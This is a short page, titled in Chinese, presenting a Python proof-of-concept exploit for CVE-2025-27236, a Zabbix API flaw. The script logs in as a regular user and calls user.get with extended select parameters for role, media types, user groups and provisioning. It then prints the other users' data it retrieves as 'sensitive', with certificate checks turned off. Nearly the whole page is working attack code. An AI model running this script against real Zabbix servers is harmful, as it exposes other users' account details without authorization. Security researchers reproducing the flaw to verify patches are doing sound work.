CVE-2025-27236 Zabbix API用户字段越权访问漏洞

# CVE-2025-27236 PoC - Zabbix API Unauthorized Field Access # This PoC demonstrates how a regular Zabbix user can access # fields they are not authorized to view via the user.get API method. import requests import json # Zabbix server configuration ZABBIX_URL = "https://zabbix-server.example.com/api_jsonrpc.php" USERNAME = "regular_user" PASSWORD = "user_password" # Step 1: Authenticate and obtain API token auth_payload = { "jsonrpc": "2.0", "method": "user.login", "params": { "username": USERNAME, "password": PASSWORD }, "id": 1 } response = requests.post(ZABBIX_URL, json=auth_payload, verify=False) auth_token = response.json().get("result") print(f"[+] Obtained auth token: {auth_token}") # Step 2: Exploit - Search users with unauthorized fields via select parameter # The vulnerability allows selecting fields the user does not have access to view exploit_payload = { "jsonrpc": "2.0", "method": "user.get", "params": { "output": ["userid", "username", "name", "surname"], # Select sensitive fields that the user should not have access to "selectRole": "extend", "selectMediatypes": "extend", "selectUsrgrps": "extend", "selectProvisioned": "extend" }, "auth": auth_token, "id": 2 } response = requests.post(ZABBIX_URL, json=exploit_payload, verify=False) result = response.json() # Step 3: Extract sensitive data from response if "result" in result: print("[+] Sensitive user data obtained via unauthorized field access:") for user in result["result"]: print(f"\nUser: {user.get('username')}") print(f" Role: {user.get('role')}") print(f" User Groups: {user.get('usrgrps')}") print(f" Media Types: {user.get('mediatypes')}") # Additional sensitive fields that should not be accessible print(f" Full Data: {json.dumps(user, indent=2)}") else: print(f"[-] Error: {result.get('error')}")